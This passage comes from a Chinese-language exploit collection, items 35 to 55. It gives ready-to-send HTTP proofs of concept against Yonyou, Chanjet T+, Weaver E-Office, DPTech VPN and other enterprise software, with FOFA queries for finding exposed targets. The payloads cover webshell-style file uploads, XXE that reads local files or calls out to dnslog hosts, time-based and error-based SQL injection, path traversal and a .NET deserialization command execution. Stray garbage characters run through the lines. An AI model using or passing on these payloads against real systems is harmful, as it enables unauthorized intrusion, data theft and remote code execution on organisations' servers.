9 I* g$ u# e0 M+ q- QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  Q8 q2 I0 E; q7 D# f4 }/ F# z+ L
Content-Type: application/x-www-form-urlencoded+ S$ b' @4 V2 v" m
Accept-Encoding: gzip, deflate# V# f; L) _6 l( ?# ^& J2 E' m
Accept: */*
. Q8 w1 y2 M) [3 }, P# IConnection: keep-alive  T6 ?5 q) a7 e1 K
5 [3 L& r  E" ?- C+ i2 x5 S

3 n- N$ ?3 L" q35. 用友NC-Cloud importhttpscer任意文件上传7 _# y& w0 z/ N
FOFA:app="用友-NC-Cloud"
1 i8 ^8 e/ S% A& f6 b) sPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
( e2 q- R, |; p4 O4 oHost: 203.25.218.166:88885 M8 S& A' E( `* W/ y
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
- x5 N6 O6 Q5 E# jAccept-Encoding: gzip, deflate3 x% h, h- O& z% [- v; D# F  k" d" `
Accept: */*8 n: u& `7 u' l/ d! @* D3 B# ~
Connection: close
  |3 A, W$ ]" h0 U! ]3 R+ l- taccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA; T: E  D! T$ H' \
Content-Length: 190
9 k' P" y5 N; L, s7 H5 N9 ?; qContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
8 ?/ n" _' x; [3 D' r( m+ i6 @7 j2 {7 W% e; s
--fd28cb44e829ed1c197ec3bc71748df0
. c; H, s; I. e# MContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
  }" c- B& i1 f8 x+ ]* R# U+ e7 q, _* r2 I$ W  p
<%out.println(1111*1111);%>5 A# a% z" _  c- k1 ]4 D7 s$ k
--fd28cb44e829ed1c197ec3bc71748df0--
/ Z* ~0 _5 J: m2 B+ R: m/ c: i+ |+ @+ K& a; _! x

  x0 E5 r+ G( j36. 用友NC-Cloud soapFormat XXE
& a: u$ M' I8 m- |! c; EFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/") A6 V8 k/ }  G( H8 w
POST /uapws/soapFormat.ajax HTTP/1.17 s: A% @: s* W( ^% X% C; Q
Host: 192.168.40.130:8989
0 G6 j4 H( F1 a; ]9 J* w6 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
, m" G  V1 J. F! z) y% ]Content-Length: 2639 @, \( N  d2 i3 J+ {* h! v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 Y" R- O5 g$ e9 E+ j3 \# ]Accept-Encoding: gzip, deflate
% J" C; C" o- iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 K& U4 y, @! G1 C5 K! r1 K! @7 l
Connection: close4 M; M0 x/ @# |* A
Content-Type: application/x-www-form-urlencoded
* |9 h( J! G# _9 d9 A5 m" k3 WUpgrade-Insecure-Requests: 1$ q- w/ x% i5 k- Q' ]! d6 P

. ]' ]$ P4 v% V( R7 s: N$ wmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a9 f! c* M" T, d4 b3 M; ]

/ E# Q" }' w" v
) J" n: x. n  [# U( ]& i37. 用友NC-Cloud IUpdateService XXE$ o/ k' ]1 w$ L5 w
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
- K- o+ S& P6 }POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
3 x8 t; j, l7 w6 r3 xHost: 192.168.40.130:8989
( W" b! t: a8 w2 R( J7 k: _7 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36; t; p& d1 L  p/ S
Content-Length: 421
. j/ S8 C+ K; a) d7 R; IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" a& |7 Z. S% t4 p  R
Accept-Encoding: gzip, deflate
& _6 p, m$ f' o3 g2 ?+ y- R6 K$ mAccept-Language: zh-CN,zh;q=0.9
. c0 D+ [- |) e8 aConnection: close- _+ l2 T6 N( k" ^
Content-Type: text/xml;charset=UTF-82 g; q. N7 f* l9 p' J+ ^* R
SOAPAction: urn:getResult. U  g. x6 L+ ~* I# T9 ^
Upgrade-Insecure-Requests: 1
) x* j/ w) U; d3 C# Y
( {) X9 F# u" Y2 @+ a$ R<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% R  ~' n3 M* e9 B( s1 t2 K
<soapenv:Header/>! F) l! j4 C1 H& R" D. ?( D: `
<soapenv:Body>" U0 k) M4 Z0 {: \: A7 _0 \
<iup:getResult>' X6 r. ~* `9 V7 u9 @$ l* w+ b
<!--type: string-->. b8 u# N8 A( J+ R, _/ S8 e
<iup:string><![CDATA[/ y) x! i* m4 n( U
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>% `2 k  K2 s  D
<xxx/>]]></iup:string>) Y# j3 l+ g$ c1 W' E5 C
</iup:getResult>
; S# Z% b3 S( v) L5 v" _</soapenv:Body>
- l( j  |& I, f</soapenv:Envelope>4 {! Y4 _) Y$ O9 x; U
( U' M2 P, s, r) l& W; ?5 W. c

, ?" o( n, ^2 }3 Z
6 T1 E; i  R+ L38. 用友U8 Cloud smartweb2.RPC.d XXE
0 ]& @" O9 A$ ^& l* O1 F1 OFOFA:app="用友-U8-Cloud"0 W* P# l3 x6 ?
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.11 c+ M. J- G- _0 ]
Host: 192.168.40.131:8088" ?/ @5 @* |/ P' S+ L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.250 @# `$ j  v, q- |% d, D) z! J
Content-Length: 260# s5 ]) ?1 U+ ?8 j3 E) w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
: r2 ]: Z6 o* j+ O) Q9 EAccept-Encoding: gzip, deflate
8 H* ]1 d. W& YAccept-Language: zh-CN,zh;q=0.95 w9 v$ n! Z  r6 u0 r4 Z3 j
Connection: close
+ J( F+ F' K+ }1 h0 YContent-Type: application/x-www-form-urlencoded6 U8 m5 F% D4 P- ?8 Z' R) T! _

5 v5 l' q5 G% {8 }8 T" m__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>$ b. z8 t' r* Q, [: E9 L$ z
: h. q6 a4 `# ~2 J& i

2 i1 D# n: N0 s5 L1 l39. 用友U8 Cloud RegisterServlet SQL注入) z3 P/ X6 p# e/ _
FOFA:title="u8c"
  M+ A" r  T# Y0 kPOST /servlet/RegisterServlet HTTP/1.1  D; P3 b+ j$ K1 P1 }- k  ^! |* S. P
Host: 192.168.86.128:8089# P; e+ i( t' V' g# Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
9 W" J" N9 _4 [! D1 J! HConnection: close0 N( L) \9 x/ D4 w  ^9 ?6 z
Content-Length: 85) p, F$ R: V9 ~, [$ H
Accept: */*- N+ o# f) f+ f/ o0 [
Accept-Language: en0 M8 q0 ^9 r3 k, Z1 p, i. c
Content-Type: application/x-www-form-urlencoded
$ j& \% z" q/ Y+ xX-Forwarded-For: 127.0.0.1' m( d: h+ [0 Z
Accept-Encoding: gzip
, h% `+ V+ d+ i5 r) Q
' H4 f" Q: X  J; c; F+ Kusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' R# s* o, a5 Q7 @
2 Y7 k1 t  o; a& F  Z  ~# C
- V" Y* D6 {. q' g$ J5 h40. 用友U8-Cloud XChangeServlet XXE
" b5 L; B+ ~) |4 x5 q$ qFOFA:app="用友-U8-Cloud"! a8 T( A3 o0 h% Y- v! u% v& b6 h+ Q
POST /service/XChangeServlet HTTP/1.11 ^) s* e! h3 b6 r; j  r+ {: y7 o
Host: x.x.x.x
0 w) D* j4 v* n- [& G2 n& `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  @4 c8 k  j8 ^, K, d3 K9 ~+ G
Content-Type: text/xml7 r, \! O; A# A, l* ^$ I' t5 U( n
Connection: close
8 P% R4 i) r" s- ^( ]- X/ l! L, {) J9 I- f* I% w
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
8 a/ n7 e; i) W6 K& J0 E  \% t8 P
! W; K" O  L* K5 B: v& u5 o, J3 {: F2 y8 C9 x: I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
; z9 \4 y: [: d. z/ c$ {( tFOFA:app="用友-U8-Cloud"
. F9 [% L2 X, ^; O/ m' a" R: kGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.17 h0 I* X, L! _3 C5 F7 g4 ~
Host:; Z! }& ?( m2 m* S- l4 j, A/ H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 _- W, G3 @; I5 uContent-Type: application/json
( z& p. @7 h0 V. @0 v# wAccept-Encoding: gzip
6 w2 {3 s0 ]7 `4 n+ fConnection: close/ g0 j3 A' Q+ V- @8 l$ q
* d! D4 e+ D9 _1 R
* q8 I( U2 d" t
42. 用友GRP-U8 SmartUpload01 文件上传, E9 ?  \7 b0 I" ~; I5 ]
FOFA:app="用友-GRP-U8"
" \) Z" R: @3 q; TPOST /u8qx/SmartUpload01.jsp HTTP/1.1
" a- l; P' ?" Z$ ]' ^Host: x.x.x.x# R( W6 \& F& a" s  E* t9 c: {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt( a+ F7 J) O2 ]6 W" E9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.369 G. Y7 e; V0 O& F0 x, g( C6 z

6 R8 c& q+ t- H+ C1 l- rPAYLOAD9 C( a7 b' {- S9 [( x; O& e1 x
0 g0 S3 k4 _" Y! B4 H
! H7 L( p7 m8 a% w: e( l
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
# P/ w4 y, q  P/ Z/ r- V0 v6 b/ {
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 J) Q* e1 M1 k) L7 \' z. [FOFA:app="用友-GRP-U8"$ G4 A6 H- V7 Q' z8 R. n5 c
POST /services/userInfoWeb HTTP/1.1
5 g2 a; M  _6 _  h  ^Host: your-ip7 V9 u8 O, t) `9 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) \- @1 X- V  h2 H' r: VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 }& F2 d# x/ uAccept-Encoding: gzip, deflate
4 f! {# ], o8 A: y# Q7 f; }Accept-Language: zh-CN,zh;q=0.9. ?; Q# ^1 U& D- u! L, L
Connection: close! @5 e* H0 N: _3 G; D
SOAPAction:  {& T3 S& Y1 l
Content-Type: text/xml;charset=UTF-8- P; I# `3 y1 k6 A& Q9 j
; B2 J$ z; o! g
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
" b: C% i* H& J. T   <soapenv:Header/>+ B  P5 T, X" F8 _" q, }
   <soapenv:Body>9 u, ^# u2 m) l; S- o9 X
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">& F1 }* f, E( Z: i
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
, j( F7 q' E) U7 B      </ser:getUserNameById>3 A( C( M- ]5 Y& j! q* P
   </soapenv:Body>
  \5 ]$ W8 b4 o; T3 p( g</soapenv:Envelope>
" V% t+ a1 G  f9 x  q( V6 X1 n' o6 Z) U, D6 L) P
0 W* H3 o* w5 M) T
44. 用友GRP-U8 bx_dj_check.jsp SQL注入/ Y  m. n) |5 I- O
FOFA:app="用友-GRP-U8"
% m: `6 P' j) r7 `GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1& r, E% ]& N( d
Host: your-ip- }) }6 h$ v/ d6 G5 N2 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
* |9 S$ }: J8 N% KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! t6 \1 H. P5 m0 P  DAccept-Encoding: gzip, deflate
1 F( E- G( W( i/ B9 hAccept-Language: zh-CN,zh;q=0.9
1 \0 R  p0 n  b5 ~3 b2 q# IConnection: close
) w# d; o/ f9 w4 t3 y& N. v4 f. Z4 A  W: Z# T8 e6 V% {' n8 m0 U. K

  [% S) l3 [6 I6 D! G$ X% i' t7 l45. 用友GRP-U8 ufgovbank XXE8 }, P: l+ z( I! \! P  g2 v
FOFA:app="用友-GRP-U8"
! o6 R" F( S9 q2 h: V6 H# _& T0 QPOST /ufgovbank HTTP/1.1
. A6 o& X8 Y/ X( Z8 @) PHost: 192.168.40.130:2224 o6 k' _$ h4 h  }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0# B( y8 T* Q* c6 a5 G0 b; ]! k3 V! o
Connection: close2 ]1 f$ Z- l  r5 O
Content-Length: 161
: b/ R- i# ^( n& _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  h/ C0 }6 I* h: G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 r. s# n9 ^1 j4 nContent-Type: application/x-www-form-urlencoded
9 B2 `1 o# O1 n% j4 YAccept-Encoding: gzip
, z! w' g; x6 }9 R- B% W( v) h9 e3 E
reqData=<?xml version="1.0"?>
" w2 I$ A3 F/ ^<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest# S% l! L0 m3 }
& i8 F) ~# ^  h# `; n
. t: ?! A8 w: }1 [; i" M1 q
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( i; W! e% {- w6 p& V0 K# T9 X$ eFOFA:app="用友-GRP-U8"( c# q: u% F8 t( U
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
- N6 d, d6 C$ x/ r/ X, b/ y6 t" F% ?- vHost: your-ip
+ N: X# @' u5 d$ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
; z+ \) i2 c( D4 Y! u) MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! B2 G4 `$ F' e( G9 d' j% z
Accept-Encoding: gzip, deflate" j3 \5 W* P2 H! p8 A
Accept-Language: zh-CN,zh;q=0.9! x( m: s  H' y% D) c
Connection: close
  @; _* `5 B# \$ c9 o3 T$ I
( D1 {3 h/ `0 L% A; e3 f
9 u4 k& R: y' G6 G% C1 L% o47. 用友GRP A++Cloud 政府财务云 任意文件读取0 A& }% }/ j6 |, o
FOFA:body="/pf/portal/login/css/fonts/style.css"
5 `4 ^2 s) M( ]3 iGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
; z% I2 w5 j* Y: w! V: a5 |Host: x.x.x.x
" g5 M, A* j1 aCache-Control: max-age=0
1 y9 `6 K1 i' [Upgrade-Insecure-Requests: 1
9 A* d7 D! P3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- X0 }7 |) W& U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' f$ E% U! w) p4 p5 V. hAccept-Encoding: gzip, deflate, br
' `7 f6 S3 ^+ \4 m# HAccept-Language: zh-CN,zh;q=0.9* d. b: g5 W# q8 N  C: U
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
) u2 t4 y7 b. c/ O& k, x# YConnection: close9 \" G4 z0 J2 C7 l# @
! m0 x' k1 K' o' \# F% K% t
4 [( c- y6 N, R

) H% F; w( f: w# I* k# F5 r9 M48. 用友U8 CRM swfupload 任意文件上传6 u& u  ^6 \) q' X
FOFA:title="用友U8CRM"  l' S3 V$ x( g9 M, a
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.12 O1 @( E& U0 Z# C( ?% R
Host: your-ip
- Y# A- [, D! Z+ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. [. D* c$ I: ]+ W( G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 H3 e3 w% n2 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( s0 u7 U( A# o& Q, XAccept-Encoding: gzip, deflate
/ Y4 x. G3 g: \- V/ ?; U; hContent-Type: multipart/form-data;boundary=----269520967239406871642430066855  C% {$ O- d2 _1 R' c
------269520967239406871642430066855
; x# c4 t# F9 {Content-Disposition: form-data; name="file"; filename="s.php"* N2 E' Q( W& {$ m/ u0 g
1231. `, c9 v3 }) p  L0 H! o
Content-Type: application/octet-stream
* L# J' d5 @' y------269520967239406871642430066855& I- {; K# `) A+ M7 v
Content-Disposition: form-data; name="upload"$ F6 }" q+ x, g
upload
5 J$ j* K0 W2 Q4 ~% V5 w------269520967239406871642430066855--/ `% S% R7 s" b" G5 G$ L6 x" F
  T1 S0 Y/ Q7 T7 b7 n: r
- ?% l- c' Q3 L
49. 用友U8 CRM系统uploadfile.php接口任意文件上传( c" G; D1 }. }  X
FOFA:body="用友U8CRM"
# k) O8 {$ r# ]2 \  A6 L5 M1 u
% M9 d6 I0 P9 D) sPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.14 N( [/ N7 U/ M3 L) J4 U( k4 \7 |, r
Host: x.x.x.x7 ^" o. t$ w; c2 L' t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( N* j  ^$ Q6 Y) W+ R$ I
Content-Length: 329
+ j# ~3 F# e4 Z- G0 q5 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ B: q+ U0 u6 d( ]6 b3 OAccept-Encoding: gzip, deflate  z( ^6 [# I3 @9 ^: _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' C3 o5 B- m7 X, WConnection: close  U" [+ M  T' t* c! J- [
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
6 Q4 F4 _3 _* w& b6 q! c. g% t- t4 V- |. J% O1 Y4 e
-----------------------------vvv3wdayqv3yppdxvn3w1 m! {- S  G; Q' S
Content-Disposition: form-data; name="file"; filename="%s.php "
; s( i8 w9 A$ W. z) _2 Q" ^Content-Type: application/octet-stream
) h* ~0 i( V2 v  o7 T% ~7 e6 J: y$ t4 U
wersqqmlumloqa$ A3 D$ ^% p0 U' a* Y, @
-----------------------------vvv3wdayqv3yppdxvn3w3 ~2 {6 F+ ]9 [- ^  c, [3 b
Content-Disposition: form-data; name="upload"$ x1 G" S) @( q( a+ C
3 C$ a5 _' w, W4 [$ c4 Q+ f! i
upload
2 n2 Y6 t8 W+ P$ a& t-----------------------------vvv3wdayqv3yppdxvn3w--# R! P/ M  U( f( ^3 ]

! W& Q; L. S# w
7 j; ~6 n( Y$ x- E0 x+ w& Dhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
( _/ x& S; p6 e) d9 h# b  Q6 `
7 D, J; k! `) {- c7 j: f50. QDocs Smart School 6.4.1 filterRecords SQL注入7 `4 m: l8 n5 @6 K8 M0 |3 T
FOFA:body="close closebtnmodal"2 V9 M9 T% p$ s" X
POST /course/filterRecords/ HTTP/1.1/ V0 Z: d* l; Z% B0 _, |
Host: x.x.x.x
( u* @3 O0 n. w1 O0 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 t6 t( I* @* M0 z
Connection: close
) g( w8 {' x( |# T- v( Q' b2 c( @Content-Length: 224
8 i8 q. r8 E7 o) l* s) LAccept: */*8 c) Z- n/ y0 a
Accept-Language: en6 X( R/ p! V# S$ t! W, L
Content-Type: application/x-www-form-urlencoded% k+ Y5 O! R. X$ S( X$ o0 k- A
Accept-Encoding: gzip
& }. w4 q( S+ ]$ Z, ?: M7 q) f" H# z+ b5 d' ~" N
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
9 J* c& N" a$ h. H  ?. i" Y- C5 ~# E) W  i& Q2 X
) ]6 ]* c; z) ?' o
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 N$ o, S" c9 d+ n
FOFA:app="云时空社会化商业ERP系统"
8 }! o  H; o8 i2 sGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 _" B' s% b5 n( d9 L' J- f+ r/ ]+ sHost: your-ip2 x, |5 \/ v0 ]' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.366 z9 Y$ m4 G9 x/ O; H2 p# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 r" K& e, |9 Q9 i8 l2 O; |" hAccept-Encoding: gzip, deflate
& q5 e5 V& @9 C# Z- d( }, S6 uAccept-Language: zh-CN,zh;q=0.9
/ U/ M, Q  t' NConnection: close
4 _6 u4 |" b3 d( S/ H: ~
! z1 }. W6 [+ P. _& _5 f" X4 V% x1 ^9 n: P- i
52. 泛微E-Office json_common.php sql注入% h- q4 n1 b0 {" t
FOFA:app="泛微-EOffice"9 J; o- K% c& H4 j5 B; A
POST /building/json_common.php HTTP/1.1% k# k4 }4 _% x3 `4 g/ w+ G
Host: 192.168.86.128:8097/ o3 t8 \+ I7 j. z1 I$ F
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 s1 ?+ I9 ^: l4 a: T  b1 T8 b+ NConnection: close
/ g: p$ A+ T6 ^. b' v9 Z( hContent-Length: 87' x+ d4 e1 X. i7 p: c' s: g3 i
Accept: */*
7 k# l2 R: E) V: V* X( @1 j* SAccept-Language: en
5 K9 ^5 W3 H* N4 S! tContent-Type: application/x-www-form-urlencoded
, ]- H; r8 G! z' G, AAccept-Encoding: gzip" J& K& O# ?6 O8 S: j4 m
# }$ [1 T& E- I! s. ]! }5 L7 }
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ }) W7 O5 ]2 B( }+ p1 R
3 ]( ]/ {- x" C( t) x
. D" [# g* F9 `% c# Z# ?0 R8 d3 m53. 迪普 DPTech VPN Service 任意文件上传
1 e, O/ `: `9 \FOFA:app="DPtech-SSLVPN"
" j: c6 v2 v, `6 A/ }/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd4 @# I3 a1 x% i2 t& r- c5 }
0 R, l5 a0 [# L
: }, `% t8 _! r% e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
) K& Z. d( s0 {4 z& ?8 }. WFOFA:app="畅捷通-TPlus"  a! e) z) r7 Y/ Q
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件4 y9 E" f% Z" L, D2 C9 S
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"  u& o( {6 @3 P
# z& n1 s' o" r+ v% ]8 w
0 I) y0 k! i& a* X2 {  T
完整数据包
# {0 ]( v  G4 M' B: u8 MPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1' e# y# E% r9 J' n. ]! z
Host: x.x.x.x; T# t0 U' \& z8 c9 G0 p
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F( y9 a- ]6 A6 M% K* c2 b
Content-Length: 593; b, m- }5 h6 `9 V8 O

( q# c9 [; o* Y8 Z1 U{
; V7 q5 S3 w) x% N3 h! i/ n) }"storeID":{/ e9 j6 M; _: R2 b. \
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
% \* V! Z5 z/ O6 \" v' S; r "MethodName":"Start",
- H, X  W- m1 a: |8 q; ]  "ObjectInstance":{
. o/ h7 V7 ]" y9 I( ^2 D* ~5 M  Z8 o   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 H. h  Y+ L8 _4 v0 `6 k
    "StartInfo":{
& R2 O0 f1 h6 G* T2 @) p: b& [   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; W0 V; `, s7 q/ H    "FileName":"cmd",$ j6 `/ V) _! ?9 a1 Z
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
% t% a" u0 V' v+ T9 I* C% [    }
4 a/ n, c- a2 o% S  }% T( d8 B1 c! t0 m4 ?8 v
  }
2 h$ Z% N5 k; J0 n/ }1 T4 C: [) e}0 h3 n. a% s+ b) X
( v. A# I8 K. p' p$ {
0 Y1 ~3 g  E  y5 {! I" v
第二步,访问如下url
2 i2 B# x+ m% z/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt/ ]! u+ E. e$ ]( n7 B

# T5 y6 Y4 s+ a1 K1 D  r; C( h3 h& O) k9 W; S
55. 畅捷通T+ getdecallusers信息泄露! I* [+ j3 q% t! l6 n) v
FOFA:app="畅捷通-TPlus"& J' [" i4 d% `- @* q
第一步,通过
" z% a; s' T( Q. h: R/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
- `! p% ]  k: u$ c- b第二步,利用获取到的Cookie请求* D- J/ w0 H3 P& t$ f
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
& }+ ~3 V0 l# _& d
